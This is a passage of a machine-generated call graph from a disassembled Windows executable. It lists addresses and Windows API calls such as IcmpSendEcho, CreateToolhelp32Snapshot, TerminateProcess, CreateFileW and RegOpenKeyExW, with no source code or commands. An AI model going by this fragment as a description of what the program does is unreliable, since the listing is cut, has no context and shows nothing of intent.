35502b 59 API calls 97927->97930 97929 354d37 84 API calls 97931 3c5eb2 97929->97931 97932 3c5e70 97930->97932 98412 36402a WideCharToMultiByte 97931->98412 97932->97923 97934 3c5ebf inet_addr gethostbyname 97935 3c5edd IcmpCreateFile 97934->97935 97934->97945 97936 3c5f01 97935->97936 97935->97945 97937 370fe6 Mailbox 59 API calls 97936->97937 97938 3c5f1a 97937->97938 97939 36433f 59 API calls 97938->97939 97940 3c5f25 97939->97940 97941 3c5f34 IcmpSendEcho 97940->97941 97942 3c5f55 IcmpSendEcho 97940->97942 97943 3c5f6d 97941->97943 97942->97943 97944 3c5fd4 IcmpCloseHandle WSACleanup 97943->97944 97944->97945 97945->97801 97947 3642e8 97946->97947 97948 3642d9 97946->97948 97947->97948 97949 3642ed CloseHandle 97947->97949 97948->97801 97949->97948 97951 370fe6 Mailbox 59 API calls 97950->97951 97952 3c496c 97951->97952 97953 36433f 59 API calls 97952->97953 97954 3c4976 97953->97954 97955 354d37 84 API calls 97954->97955 97956 3c498d GetEnvironmentVariableW 97955->97956 98445 3b7a51 59 API calls Mailbox 97956->98445 97958 3c49aa 97958->97801 98446 354f98 97959->98446 97963 370fe6 Mailbox 59 API calls 97964 35d6aa 97963->97964 97967 35d6ba 97964->97967 97968 363df7 60 API calls 97964->97968 97965 395068 97966 35d6df 97965->97966 98502 3bfbb7 59 API calls 97965->98502 97971 35502b 59 API calls 97966->97971 97976 35d6ec 97966->97976 97969 354d37 84 API calls 97967->97969 97968->97967 97970 35d6c8 97969->97970 97972 363e47 67 API calls 97970->97972 97973 3950b0 97971->97973 97974 35d6d7 97972->97974 97975 3950b8 97973->97975 97973->97976 97974->97965 97974->97966 98501 363f0b CloseHandle 97974->98501 97978 35502b 59 API calls 97975->97978 97977 3641d6 2 API calls 97976->97977 97980 35d6f3 97977->97980 97978->97980 97981 3950ca 97980->97981 97982 35d70d 97980->97982 97983 370fe6 Mailbox 59 API calls 97981->97983 97984 361207 59 API calls 97982->97984 97985 3950d0 97983->97985 97986 35d715 97984->97986 97987 3950e4 97985->97987 98488 363ea1 97985->98488 98459 363bc3 97986->98459 97993 3950e8 _memmove 97987->97993 98491 3b7c7f 97987->98491 97991 35d724 97991->97993 98482 354f3c 97991->98482 97993->97993 97994 35d738 Mailbox 97995 35d772 97994->97995 97996 3642cf CloseHandle 97994->97996 97995->97801 97997 35d766 97996->97997 97997->97995 98500 363f0b CloseHandle 97997->98500 98000 354d37 84 API calls 97999->98000 98001 3c4b5f 98000->98001 98546 3620e0 98001->98546 98003 3c4b6f 98004 3c4b94 98003->98004 98005 3553b0 291 API calls 98003->98005 98006 354f98 59 API calls 98004->98006 98007 3c4b98 98004->98007 98005->98004 98006->98007 98007->97801 98009 354d37 84 API calls 98008->98009 98010 3cf1cf 98009->98010 98591 3b4148 CreateToolhelp32Snapshot Process32FirstW 98010->98591 98012 3cf1de 98012->97801 98013->97822 98014->97822 98017 35519b 98015->98017 98016 3551d2 98016->97801 98017->98016 98610 3541c4 59 API calls Mailbox 98017->98610 98019 3551fd 98019->97801 98020->97791 98021->97792 98022->97785 98023->97798 98024->97800 98026 361ca7 98025->98026 98027 361caf 98025->98027 98611 361bcc 98026->98611 98027->97791 98029->97791 98031 361a45 __NMSG_WRITE _memmove 98030->98031 98032 370fe6 Mailbox 59 API calls 98031->98032 98033 361a83 98032->98033 98033->97791 98034->97791 98035->97791 98036->97801 98037->97811 98038->97805 98039->97828 98040->97776 98041->97805 98042->97776 98043->97805 98044->97805 98045->97862 98046->97862 98047->97852 98048->97863 98049->97866 98050->97863 98051->97863 98090 354d37 98052->98090 98056 3cd617 98158 3cdfb1 92 API calls Mailbox 98056->98158 98057 3cd24a Mailbox 98057->97869 98060 3cd29b Mailbox 98060->98057 98063 354d37 84 API calls 98060->98063 98076 3cd4a2 98060->98076 98140 3bfc0d 59 API calls 2 library calls 98060->98140 98141 3cd6c8 61 API calls 2 library calls 98060->98141 98061 3cd626 98062 3cd4b0 98061->98062 98064 3cd632 98061->98064 98121 3cd057 98062->98121 98063->98060 98064->98057 98069 3cd4e9 98136 370e38 98069->98136 98072 3cd51c 98143 3547be 98072->98143 98073 3cd503 98142 3ba48d 89 API calls 4 library calls 98073->98142 98076->98056 98076->98062 98078 3cd50e GetCurrentProcess TerminateProcess 98078->98072 98082 3cd68d 98082->98057 98086 3cd6a1 FreeLibrary 98082->98086 98083 3cd554 98155 3cdd32 107 API calls _free 98083->98155 98086->98057 98088 3cd565 98088->98082 98156 354230 59 API calls Mailbox 98088->98156 98157 35523c 59 API calls 98088->98157 98159 3cdd32 107 API calls _free 98088->98159 98091 354d51 98090->98091 98100 354d4b 98090->98100 98092 354d57 __itow 98091->98092 98093 38db28 __i64tow 98091->98093 98094 354d99 98091->98094 98098 38da2f 98091->98098 98097 370fe6 Mailbox 59 API calls 98092->98097 98160 3738c8 83 API calls 3 library calls 98094->98160 98099 354d71 98097->98099 98101 370fe6 Mailbox 59 API calls 98098->98101 98106 38daa7 Mailbox _wcscpy 98098->98106 98099->98100 98102 361a36 59 API calls 98099->98102 98100->98057 98108 3cde8e 98100->98108 98103 38da74 98101->98103 98102->98100 98104 370fe6 Mailbox 59 API calls 98103->98104 98105 38da9a 98104->98105 98105->98106 98107 361a36 59 API calls 98105->98107 98161 3738c8 83 API calls 3 library calls 98106->98161 98107->98106 98162 361aa4 98108->98162 98110 3cdea9 CharLowerBuffW 98166 3af903 98110->98166 98114 361207 59 API calls 98115 3cdee2 98114->98115 98173 361462 98115->98173 98117 3cdef9 98186 361981 98117->98186 98119 3cdf05 Mailbox 98120 3cdf41 Mailbox 98119->98120 98190 3cd6c8 61 API calls 2 library calls 98119->98190 98120->98060 98122 3cd072 98121->98122 98126 3cd0c7 98121->98126 98123 370fe6 Mailbox 59 API calls 98122->98123 98124 3cd094 98123->98124 98125 370fe6 Mailbox 59 API calls 98124->98125 98124->98126 98125->98124 98127 3ce139 98126->98127 98128 3ce362 Mailbox 98127->98128 98135 3ce15c _strcat _wcscpy __NMSG_WRITE 98127->98135 98128->98069 98129 35502b 59 API calls 98129->98135 98130 3550d5 59 API calls 98130->98135 98131 355087 59 API calls 98131->98135 98132 37593c 58 API calls __crtCompareStringA_stat 98132->98135 98133 354d37 84 API calls 98133->98135 98135->98128 98135->98129 98135->98130 98135->98131 98135->98132 98135->98133 98200 3b5e42 61 API calls 2 library calls 98135->98200 98138 370e4d 98136->98138 98137 370ee5 CreateToolhelp32Snapshot 98139 370eb3 98137->98139 98138->98137 98138->98139 98139->98072 98139->98073 98140->98060 98141->98060 98142->98078 98144 3547c6 98143->98144 98145 370fe6 Mailbox 59 API calls 98144->98145 98146 3547d4 98145->98146 98147 3547e0 98146->98147 98201 3546ec 59 API calls Mailbox 98146->98201 98149 354540 98147->98149 98202 354650 98149->98202 98151 35454f 98152 370fe6 Mailbox 59 API calls 98151->98152 98153 3545eb 98151->98153 98152->98153 98153->98088 98154 354230 59 API calls Mailbox 98153->98154 98154->98083 98155->98088 98156->98088 98157->98088 98158->98061 98159->98088 98160->98092 98161->98093 98163 361ab7 98162->98163 98165 361ab4 _memmove 98162->98165 98164 370fe6 Mailbox 59 API calls 98163->98164 98164->98165 98165->98110 98168 3af92e __NMSG_WRITE 98166->98168 98167 3af96d 98167->98114 98167->98119 98168->98167 98170 3afa14 98168->98170 98171 3af963 98168->98171 98170->98167 98192 3614db 61 API calls 98170->98192 98171->98167 98191 3614db 61 API calls 98171->98191 98174 361471 98173->98174 98175 3614ce 98173->98175 98174->98175 98177 36147c 98174->98177 98176 361981 59 API calls 98175->98176 98182 36149f _memmove 98176->98182 98178 361497 98177->98178 98179 39f1de 98177->98179 98193 361b7c 98178->98193 98197 361c7e 98179->98197 98182->98117 98183 39f1e8 98184 370fe6 Mailbox 59 API calls 98183->98184 98185 39f208 98184->98185 98187 36198f 98186->98187 98189 361998 _memmove 98186->98189 98188 361aa4 59 API calls 98187->98188 98187->98189 98188->98189 98189->98119 98190->98120 98191->98171 98192->98170 98194 361b8e 98193->98194 98195 361b94 98193->98195 98194->98182 98196 370fe6 Mailbox 59 API calls 98195->98196 98196->98194 98198 370fe6 Mailbox 59 API calls 98197->98198 98199 361c88 98198->98199 98199->98183 98200->98135 98201->98147 98203 354659 Mailbox 98202->98203 98204 38d6ec 98203->98204 98209 354663 98203->98209 98205 370fe6 Mailbox 59 API calls 98204->98205 98206 38d6f8 98205->98206 98207 35466a 98207->98151 98208 355190 Mailbox 59 API calls 98208->98209 98209->98207 98209->98208 98211 3b413f 98210->98211 98212 3b4965 FindFirstFileW 98210->98212 98211->97801 98212->98211 98213 3b497a FindClose 98212->98213 98213->98211 98215 361207 59 API calls 98214->98215 98216 37012f 98215->98216 98217 361207 59 API calls 98216->98217 98218 370137 98217->98218 98219 361207 59 API calls 98218->98219 98220 37013f 98219->98220 98221 361207 59 API calls 98220->98221 98222 370147 98221->98222 98223 3a627d 98222->98223 98224 37017b 98222->98224 98225 361c9c 59 API calls 98223->98225 98226 361462 59 API calls 98224->98226 98227 3a6286 98225->98227 98228 370189 98226->98228 98315 3619e1 98227->98315 98230 361981 59 API calls 98228->98230 98231 370193 98230->98231 98232 3701be 98231->98232 98233 361462 59 API calls 98231->98233 98234 3701dd 98232->98234 98235 3a62a6 98232->98235 98251 3701fe 98232->98251 98236 3701b4 98233->98236 98312 361609 98234->98312 98239 3a6376 98235->98239 98247 3a635f 98235->98247 98259 3a62dd 98235->98259 98240 361981 59 API calls 98236->98240 98237 361462 59 API calls 98238 37020f 98237->98238 98242 370221 98238->98242 98245 361c9c 59 API calls 98238->98245 98243 361821 59 API calls 98239->98243 98240->98232 98246 361c9c 59 API calls 98242->98246 98248 370231 98242->98248 98260 3a6333 98243->98260 98245->98242 98246->98248 98247->98239 98255 3a634a 98247->98255 98249 370238 98248->98249 98252 361c9c 59 API calls 98248->98252 98253 361c9c 59 API calls 98249->98253 98262 37023f Mailbox 98249->98262 98250 361462 59 API calls 98250->98251 98251->98237 98252->98249 98253->98262 98254 361609 59 API calls 98254->98260 98258 361821 59 API calls 98255->98258 98256 3a633b 98257 361821 59 API calls 98256->98257 98257->98260 98258->98260 98259->98256 98263 3a6326 98259->98263 98260->98251 98260->98254 98328 36153b 59 API calls 2 library calls 98260->98328 98262->97893 98319 361821 98263->98319 98266 3617f2 98265->98266 98267 39f401 98265->98267 98329 361680 98266->98329 98335 3a87f9 59 API calls _memmove 98267->98335 98270 3617fe 98270->97905 98270->97916 98271 39f40b 98272 361c9c 59 API calls 98271->98272 98273 39f413 Mailbox 98272->98273 98336 36133d 98274->98336 98277 3b3f66 GetLastError 98278 3b3f73 CreateDirectoryW 98277->98278 98279 3b3f81 98277->98279 98278->98279 98280 3b3f7f Mailbox 98278->98280 98279->98280 98281 361981 59 API calls 98279->98281 98280->97916 98282 3b3fc3 98281->98282 98283 3b3f1d 59 API calls 98282->98283 98284 3b3fcc 98283->98284 98284->98280 98285 3b3fd0 CreateDirectoryW 98284->98285 98285->98280 98287 3642cf CloseHandle 98286->98287 98288 363e53 98287->98288 98340 3642f9 98288->98340 98290 363e95 98290->97892 98290->97899 98291 363e72 98291->98290 98348 363c61 98291->98348 98293 363e84 98365 36389f 98293->98365 98298 35503c 98297->98298 98299 355041 98297->98299 98298->98299 98406 3737ba 59 API calls 98298->98406 98299->97874 98302 370fe6 Mailbox 59 API calls 98301->98302 98303 363e07 98302->98303 98304 3642cf CloseHandle 98303->98304 98305 363e12 98304->98305 98306 361207 59 API calls 98305->98306 98307 363e1a 98306->98307 98308 3642cf CloseHandle 98307->98308 98309 363e21 98308->98309 98309->97880 98310->97914 98311->97914 98313 361aa4 59 API calls 98312->98313 98314 361614 98313->98314 98314->98250 98314->98251 98316 3619ee 98315->98316 98317 3619fb 98315->98317 98316->98232 98318 370fe6 Mailbox 59 API calls 98317->98318 98318->98316 98320 36182d __NMSG_WRITE 98319->98320 98321 36189a 98319->98321 98323 361843 98320->98323 98324 361868 98320->98324 98322 361981 59 API calls 98321->98322 98327 36184b _memmove 98322->98327 98325 361b7c 59 API calls 98323->98325 98326 361c7e 59 API calls 98324->98326 98325->98327 98326->98327 98327->98260 98328->98260 98330 361692 98329->98330 98333 3616ba _memmove 98329->98333 98331 370fe6 Mailbox 59 API calls 98330->98331 98330->98333 98334 36176f _memmove 98331->98334 98332 370fe6 Mailbox 59 API calls 98332->98334 98333->98270 98334->98332 98335->98271 98337 36134b 98336->98337 98338 361981 59 API calls 98337->98338 98339 36135b GetFileAttributesW 98338->98339 98339->98277 98339->98280 98341 364312 CreateFileW 98340->98341 98342 3a06fc 98340->98342 98343 364334 98341->98343 98342->98343 98344 3a0702 CreateFileW 98342->98344 98343->98291 98344->98343 98345 3a0728 98344->98345 98372 36410a 98345->98372 98349 3a0549 98348->98349 98350 363c7c 98348->98350 98364 363d0b 98349->98364 98391 3641d6 98349->98391 98351 36410a 2 API calls 98350->98351 98350->98364 98352 363c9e 98351->98352 98382 36433f 98352->98382 98356 363cb5 98357 370fe6 Mailbox 59 API calls 98356->98357 98358 363cc0 98357->98358 98359 36433f 59 API calls 98358->98359 98360 363ccb 98359->98360 98385 364220 98360->98385 98363 36410a 2 API calls 98363->98364 98364->98293 98366 3638b5 98365->98366 98367 3638a8 98365->98367 98366->98290 98369 3b394d 98366->98369 98368 36410a 2 API calls 98367->98368 98368->98366 98397 3b384c 98369->98397 98371 3b3959 WriteFile 98371->98290 98379 364124 98372->98379 98373 3a06cc 98381 3642ae SetFilePointerEx 98373->98381 98374 3641ab SetFilePointerEx 98380 3642ae SetFilePointerEx 98374->98380 98377 3a06e6 98378 36417f 98378->98343 98379->98373 98379->98374 98379->98378 98380->98378 98381->98377 98383 370fe6 Mailbox 59 API calls 98382->98383 98384 363ca8 98383->98384 98384->98349 98384->98356 98386 364293 98385->98386 98389 36422e 98385->98389 98396 3642ae SetFilePointerEx 98386->98396 98388 363cf8 98388->98363 98389->98388 98390 364266 ReadFile 98389->98390 98390->98388 98390->98389 98392 36410a 2 API calls 98391->98392 98393 3641f7 98392->98393 98394 36410a 2 API calls 98393->98394 98395 36420b 98394->98395 98395->98364 98396->98389 98398 3b385e 98397->98398 98399 3b3853 98397->98399 98398->98371 98404 3642ae SetFilePointerEx 98399->98404 98401 3b38b8 SetFilePointerEx 98405 3642ae SetFilePointerEx 98401->98405 98403 3b38d7 98403->98371 98404->98401 98405->98403 98406->98299 98408 370fe6 Mailbox 59 API calls 98407->98408 98409 3640e0 98408->98409 98410 361c7e 59 API calls 98409->98410 98411 3640ed 98410->98411 98411->97929 98413 364085 98412->98413 98414 36404e 98412->98414 98433 363f20 98413->98433 98416 370fe6 Mailbox 59 API calls 98414->98416 98417 364055 WideCharToMultiByte 98416->98417 98420 363f79 98417->98420 98419 364077 98419->97934 98421 363f87 98420->98421 98422 363fc5 98420->98422 98421->98422 98424 363f92 98421->98424 98444 3b36bf 59 API calls _memmove 98422->98444 98425 3a05fe 98424->98425 98426 363fa0 98424->98426 98427 361c7e 59 API calls 98425->98427 98440 363f3c 98426->98440 98429 3a0608 98427->98429 98431 370fe6 Mailbox 59 API calls 98429->98431 98430 363fa8 _memmove 98430->98419 98432 3a061a 98431->98432 98434 363f31 98433->98434 98435 3a05e0 98433->98435 98434->98419 98436 361c7e 59 API calls 98435->98436 98437 3a05ea 98436->98437 98438 370fe6 Mailbox 59 API calls 98437->98438 98439 3a05f6 98438->98439 98441 363f4e 98440->98441 98443 363f6c 98440->98443 98442 370fe6 Mailbox 59 API calls 98441->98442 98442->98443 98443->98430 98444->98430 98445->97958 98447 38dd2b 98446->98447 98448 354fa8 98446->98448 98449 38dd3c 98447->98449 98451 361821 59 API calls 98447->98451 98452 370fe6 Mailbox 59 API calls 98448->98452 98450 3619e1 59 API calls 98449->98450 98455 38dd46 98450->98455 98451->98449 98453 354fbb 98452->98453 98453->98455 98456 354fc6 98453->98456 98454 354fd4 98454->97963 98454->97965 98455->98454 98457 361207 59 API calls 98455->98457 98456->98454 98458 361a36 59 API calls 98456->98458 98457->98454 98458->98454 98460 363bf3 98459->98460 98461 363bce 98459->98461 98462 3619e1 59 API calls 98460->98462 98461->98460 98463 363bdd 98461->98463 98468 3b3751 98462->98468 98464 363b7b 98463->98464 98467 363bed 98463->98467 98469 3640cd 59 API calls 98464->98469 98465 3b3780 98465->97991 98471 3640cd 59 API calls 98467->98471 98468->98465 98517 3b36ed ReadFile SetFilePointerEx 98468->98517 98518 36153b 59 API calls 2 library calls 98468->98518 98470 363b8d 98469->98470 98503 363b23 98470->98503 98474 3b3871 98471->98474 98476 363b23 61 API calls 98474->98476 98477 3b387f 98476->98477 98479 3b388f Mailbox 98477->98479 98519 3613f1 61 API calls Mailbox 98477->98519 98479->97991 98481 363bab Mailbox 98481->97991 98483 354f87 98482->98483 98485 354f48 98482->98485 98484 361c9c 59 API calls 98483->98484 98487 354f5b 98484->98487 98486 370fe6 Mailbox 59 API calls 98485->98486 98486->98487 98487->97994 98489 364220 2 API calls 98488->98489 98490 363eb2 98489->98490 98490->97987 98492 3b7c8a 98491->98492 98493 370fe6 Mailbox 59 API calls 98492->98493 98494 3b7c91 98493->98494 98495 3b7cbe 98494->98495 98496 3b7c9d 98494->98496 98498 370fe6 Mailbox 59 API calls 98495->98498 98497 370fe6 Mailbox 59 API calls 98496->98497 98499 3b7ca6 _memset 98497->98499 98498->98499 98499->97993 98500->97995 98501->97965 98502->97965 98504 363f20 59 API calls 98503->98504 98507 363b34 98504->98507 98505 363b65 98505->98481 98509 36124d MultiByteToWideChar 98505->98509 98506 364220 2 API calls 98506->98507 98507->98505 98507->98506 98520 36408f 98507->98520 98510 361273 98509->98510 98511 3612ba 98509->98511 98513 370fe6 Mailbox 59 API calls 98510->98513 98512 3619e1 59 API calls 98511->98512 98516 3612ac 98512->98516 98514 361288 MultiByteToWideChar 98513->98514 98534 361364 98514->98534 98516->98481 98517->98468 98518->98468 98519->98479 98521 3640a3 98520->98521 98522 3a0692 98520->98522 98529 363fce 98521->98529 98524 361c7e 59 API calls 98522->98524 98526 3a069d 98524->98526 98525 3640af 98525->98507 98527 370fe6 Mailbox 59 API calls 98526->98527 98528 3a06b2 _memmove 98527->98528 98530 363fe6 98529->98530 98533 363fdf _memmove 98529->98533 98531 3a0622 98530->98531 98532 370fe6 Mailbox 59 API calls 98530->98532 98532->98533 98533->98525 98535 3613e6 98534->98535 98536 361373 98534->98536 98537 361981 59 API calls 98535->98537 98536->98535 98538 36137f 98536->98538 98543 361391 _memmove 98537->98543 98539 3613b7 98538->98539 98540 361389 98538->98540 98542 361c7e 59 API calls 98539->98542 98541 361b7c 59 API calls 98540->98541 98541->98543 98544 3613c1 98542->98544 98543->98516 98545 370fe6 Mailbox 59 API calls 98544->98545 98545->98543 98572 36162d 98546->98572 98548 36230d 98579 36343f 98548->98579 98551 362327 Mailbox 98551->98003 98553 39f885 98589 3b0065 91 API calls 4 library calls 98553->98589 98555 36343f 59 API calls 98565 362105 _memmove 98555->98565 98558 3619e1 59 API calls 98558->98565 98559 39f893 98560 36343f 59 API calls 98559->98560 98561 39f8a9 98560->98561 98561->98551 98562 39f754 98564 361c7e 59 API calls 98562->98564 98567 39f75f 98564->98567 98565->98548 98565->98553 98565->98555 98565->98558 98565->98562 98566 39f7b4 98565->98566 98568 361aa4 59 API calls 98565->98568 98571 3626b7 _memmove 98565->98571 98577 361e05 60 API calls 98565->98577 98578 3635b9 59 API calls Mailbox 98565->98578 98587 361d0b 60 API calls 98565->98587 98588 36153b 59 API calls 2 library calls 98565->98588 98566->98571 98570 370fe6 Mailbox 59 API calls 98567->98570 98569 3622de CharUpperBuffW 98568->98569 98569->98565 98570->98571 98571->98566 98590 3b0065 91 API calls 4 library calls 98571->98590 98573 370fe6 Mailbox 59 API calls 98572->98573 98574 361652 98573->98574 98575 370fe6 Mailbox 59 API calls 98574->98575 98576 361660 98575->98576 98576->98565 98577->98565 98578->98565 98580 363452 _memmove 98579->98580 98581 3634df 98579->98581 98582 370fe6 Mailbox 59 API calls 98580->98582 98583 370fe6 Mailbox 59 API calls 98581->98583 98585 363459 98582->98585 98583->98580 98584 363482 98584->98551 98585->98584 98586 370fe6 Mailbox 59 API calls 98585->98586 98586->98584 98587->98565 98588->98565 98589->98559 98590->98551 98601 3b4ce2 98591->98601 98593 3b4195 Process32NextW 98594 3b4244 CloseHandle 98593->98594 98596 3b418e Mailbox 98593->98596 98594->98012 98595 361207 59 API calls 98595->98596 98596->98593 98596->98594 98596->98595 98597 361a36 59 API calls 98596->98597 98598 370119 59 API calls 98596->98598 98599 3617e0 59 API calls 98596->98599 98607 36151f 61 API calls 98596->98607 98597->98596 98598->98596 98599->98596 98602 3b4d09 98601->98602 98606 3b4cf0 98601->98606 98609 3737c3 59 API calls __wcstoi64 98602->98609 98605 3b4d0f 98605->98596 98606->98602 98606->98605 98608 37385c GetStringTypeW _iswctype 98606->98608 98607->98596 98608->98606 98609->98605 98610->98019 98612 361bef _memmove 98611->98612 98613 361bdc 98611->98613 98612->98027 98613->98612 98614 370fe6 Mailbox 59 API calls 98613->98614 98614->98612 98615 3901f8 98616 3901fa 98615->98616 98619 3b4d18 SHGetFolderPathW 98616->98619 98618 390203 98618->98618 98620 361821 59 API calls 98619->98620 98621 3b4d45 98620->98621 98621->98618 98622 351016 98627 365ce7 98622->98627 98625 372f70 __cinit 67 API calls 98626 351025 98625->98626 98628 370fe6 Mailbox 59 API calls 98627->98628 98629 365cef 98628->98629 98630 35101b 98629->98630 98634 365f39 98629->98634 98630->98625 98635 365cfb 98634->98635 98636 365f42 98634->98636 98638 365d13 98635->98638 98637 372f70 __cinit 67 API calls 98636->98637 98637->98635 98639 361207 59 API calls 98638->98639 98640 365d2b GetVersionExW 98639->98640 98641 361821 59 API calls 98640->98641 98642 365d6e 98641->98642 98643 361981 59 API calls 98642->98643 98646 365d9b 98642->98646 98644 365d8f 98643->98644 98645 36133d 59 API calls 98644->98645 98645->98646 98647 365e00 GetCurrentProcess IsWow64Process 98646->98647 98649 3a1098 98646->98649 98648 365e19 98647->98648 98650 365e2f 98648->98650 98651 365e98 GetSystemInfo 98648->98651 98662 3655f0 98650->98662 98652 365e65 98651->98652 98652->98630 98655 365e41 98657 3655f0 2 API calls 98655->98657 98656 365e8c GetSystemInfo 98658 365e56 98656->98658 98659 365e49 GetNativeSystemInfo 98657->98659 98658->98652 98660 365e5c FreeLibrary 98658->98660 98659->98658 98660->98652 98663 365619 98662->98663 98664 3655f9 LoadLibraryA 98662->98664 98663->98655 98663->98656 98664->98663 98665 36560a GetProcAddress 98664->98665 98665->98663 98666 35107d 98671 362fc5 98666->98671 98668 35108c 98669 372f70 __cinit 67 API calls 98668->98669 98670 351096 98669->98670 98672 362fd5 __write_nolock 98671->98672 98673 361207 59 API calls 98672->98673 98674 36308b 98673->98674 98702 3700cf 98674->98702 98676 363094 98709 3708c1 98676->98709 98683 361207 59 API calls 98684 3630c5 98683->98684 98685 3619e1 59 API calls 98684->98685 98686 3630ce RegOpenKeyExW 98685->98686 98687 3a01a3 RegQueryValueExW 98686->98687 98691 3630f0 Mailbox 98686->98691 98688 3a01c0 98687->98688 98689 3a0235 RegCloseKey 98687->98689 98690 370fe6 Mailbox 59 API calls 98688->98690 98689->98691 98701 3a0247 _wcscat Mailbox __NMSG_WRITE 98689->98701 98692 3a01d9 98690->98692 98691->98668 98693 36433f 59 API calls 98692->98693 98694 3a01e4 RegQueryValueExW 98693->98694 98695 3a0201 98694->98695 98698 3a021b 98694->98698 98696 361821 59 API calls 98695->98696 98696->98698 98697 361609 59 API calls 98697->98701 98698->98689 98699 361a36 59 API calls 98699->98701 98700 364c94 59 API calls 98700->98701 98701->98691 98701->98697 98701->98699 98701->98700 98728 381b70 98702->98728 98705 361a36 59 API calls 98706 370102 98705->98706 98730 370284 98706->98730 98708 37010c Mailbox 98708->98676 98710 381b70 __write_nolock 98709->98710 98711 3708ce GetFullPathNameW 98710->98711 98712 3708f0 98711->98712 98713 361821 59 API calls 98712->98713 98714 36309f 98713->98714 98715 361900 98714->98715 98716 361914 98715->98716 98717 39f534 98715->98717 98740 3618a5 98716->98740 98719 361c7e 59 API calls 98717->98719 98720 39f53f __NMSG_WRITE _memmove 98719->98720 98721 36191f 98722 364c94 98721->98722 98723 364ca2 98722->98723 98727 364cc4 _memmove 98722->98727 98725 370fe6 Mailbox 59 API calls 98723->98725 98724 370fe6 Mailbox 59 API calls 98726 3630bc 98724->98726 98725->98727 98726->98683 98727->98724 98729 3700dc GetModuleFileNameW 98728->98729 98729->98705 98731 381b70 __write_nolock 98730->98731 98732 370291 GetFullPathNameW 98731->98732 98733 3702b0 98732->98733 98734 3702cd 98732->98734 98736 361821 59 API calls 98733->98736 98735 3619e1 59 API calls 98734->98735 98737 3702bc 98735->98737 98736->98737 98738 36133d 59 API calls 98737->98738 98739 3702c8 98738->98739 98739->98708 98741 3618b4 __NMSG_WRITE 98740->98741 98742 3618c5 _memmove 98741->98742 98743 361c7e 59 API calls 98741->98743 98742->98721 98744 39f4f1 _memmove 98743->98744 98745 351066 98750 35aaaa 98745->98750 98747 35106c 98748 372f70 __cinit 67 API calls 98747->98748 98749 351076 98748->98749 98751 35aacb 98750->98751 98783 3702eb 98751->98783 98755 35ab12 98756 361207 59 API calls 98755->98756 98757 35ab1c 98756->98757 98758 361207 59 API calls 98757->98758 98759 35ab26 98758->98759 98760 361207 59 API calls 98759->98760 98761 35ab30 98760->98761 98762 361207 59 API calls 98761->98762 98763 35ab6e 98762->98763 98764 361207 59 API calls 98763->98764 98765 35ac39 98764->98765 98793 370588 98765->98793 98769 35ac6b 98770 361207 59 API calls 98769->98770 98771 35ac75 98770->98771 98821 36fe2b 98771->98821 98773 35acbc 98774 35accc GetStdHandle 98773->98774 98775 392f39 98774->98775 98776 35ad18 98774->98776 98775->98776 98778 392f42 98775->98778 98777 35ad20 OleInitialize 98776->98777 98777->98747 98828 3b70f3 64 API calls Mailbox 98778->98828 98780 392f49 98829 3b77c2 CreateThread 98780->98829 98782 392f55 CloseHandle 98782->98777 98830 3703c4 98783->98830 98786 3703c4 59 API calls 98787 37032d 98786->98787 98788 361207 59 API calls 98787->98788 98789 370339 98788->98789 98790 361821 59 API calls 98789->98790 98791 35aad1 98790->98791 98792 3707bb 6 API calls 98791->98792 98792->98755 98794 361207 59 API calls 98793->98794 98795 370598 98794->98795 98796 361207 59 API calls 98795->98796 98797 3705a0 98796->98797 98837 3610c3 98797->98837 98800 3610c3 59 API calls 98801 3705b0 98800->98801 98802 361207 59 API calls 98801->98802 98803 3705bb 98802->98803 98804 370fe6 Mailbox 59 API calls 98803->98804 98805 35ac43 98804->98805 98806 36ff4c 98805->98806 98807 36ff5a 98806->98807 98808 361207 59 API calls 98807->98808 98809 36ff65 98808->98809 98810 361207 59 API calls 98809->98810 98811 36ff70 98810->98811 98812 361207 59 API calls 98811->98812 98813 36ff7b 98812->98813 98814 361207 59 API calls 98813->98814 98815 36ff86 98814->98815 98816 3610c3 59 API calls 98815->98816 98817 36ff91 98816->98817 98818 370fe6 Mailbox 59 API calls 98817->98818 98819 36ff98 RegisterWindowMessageW 98818->98819 98819->98769 98822 3a620c 98821->98822 98823 36fe3b 98821->98823 98840 3ba12a 59 API calls 98822->98840 98824 370fe6 Mailbox 59 API calls 98823->98824 98826 36fe43 98824->98826 98826->98773 98827 3a6217 98828->98780 98829->98782 98841 3b77a8 65 API calls 98829->98841 98831 361207 59 API calls 98830->98831 98832 3703cf 98831->98832 98833 361207 59 API calls 98832->98833 98834 3703d7 98833->98834 98835 361207 59 API calls 98834->98835 98836 370323 98835->98836 98836->98786 98838 361207 59 API calls 98837->98838 98839 3610cb 98838->98839 98839->98800 98840->98827 98842 377e83 98843 377e8f _flsall 98842->98843 98879 37a038 GetStartupInfoW 98843->98879 98845 377e94 98881 378dac GetProcessHeap 98845->98881 98847 377eec 98848 377ef7 98847->98848 98964 377fd3 58 API calls 3 library calls 98847->98964 98882 379d16 98848->98882 98851 377efd 98852 377f08 __RTC_Initialize 98851->98852 98965 377fd3 58 API calls 3 library calls 98851->98965 98903 37d802 98852->98903 98855 377f17 98856 377f23 GetCommandLineW 98855->98856 98966 377fd3 58 API calls 3 library calls 98855->98966 98922 385153 GetEnvironmentStringsW 98856->98922 98859 377f22 98859->98856 98862 377f3d 98863 377f48 98862->98863 98967 3732e5 58 API calls 3 library calls 98862->98967 98932 384f88 98863->98932 98866 377f4e 98867 377f59 98866->98867 98968 3732e5 58 API calls 3 library calls 98866->98968 98946 37331f 98867->98946 98870 377f61 98871 377f6c __wwincmdln 98870->98871 98969 3732e5 58 API calls 3 library calls 98870->98969 98952 365f8b 98871->98952 98874 377f80 98875 377f8f 98874->98875 98970 373588 58 API calls _doexit 98874->98970 98971 373310 58 API calls _doexit 98875->98971 98878 377f94 _flsall 98880 37a04e 98879->98880 98880->98845 98881->98847 98972 3733b7 36 API calls 2 library calls 98882->98972 98884 379d1b 98973 379f6c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 98884->98973 98886 379d24 98974 379d8c 61 API calls 2 library calls 98886->98974 98887 379d20 98887->98886 98975 379fba TlsAlloc 98887->98975 98890 379d29 98890->98851 98891 379d36 98891->98886 98892 379d41 98891->98892 98976 378a05 98892->98976 98895 379d83 98984 379d8c 61 API calls 2 library calls 98895->98984 98898 379d62 98898->98895 98900 379d68 98898->98900 98899 379d88 98899->98851 98983 379c63 58 API calls 4 library calls 98900->98983 98902 379d70 GetCurrentThreadId 98902->98851 98904 37d80e _flsall 98903->98904 98905 379e3b __lock 58 API calls 98904->98905 98906 37d815 98905->98906 98907 378a05 __calloc_crt 58 API calls 98906->98907 98909 37d826 98907->98909 